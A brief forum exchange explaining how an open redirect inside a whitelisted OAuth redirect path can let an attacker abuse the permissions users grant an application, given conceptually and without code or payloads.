[jlafon]

I'm trying to understand this too. This is only a problem if the OAuth provider (Google, Twitter, etc) does not validate the URL that the client is trying to redirect the user to after the user has authorized the app, correct?

[patio11]

Typically you pre-register a whitelist of redirect URLs with your OAuth provider. For example, you might whitelist example.com/app/* because you control the app and assume that you won't do anything evil. If /app/ includes an open redirect (generally considered to be Severity: Nominal), your application can be made to attack every user who grants it permissions, to the limit of the permissions they entrust your application with.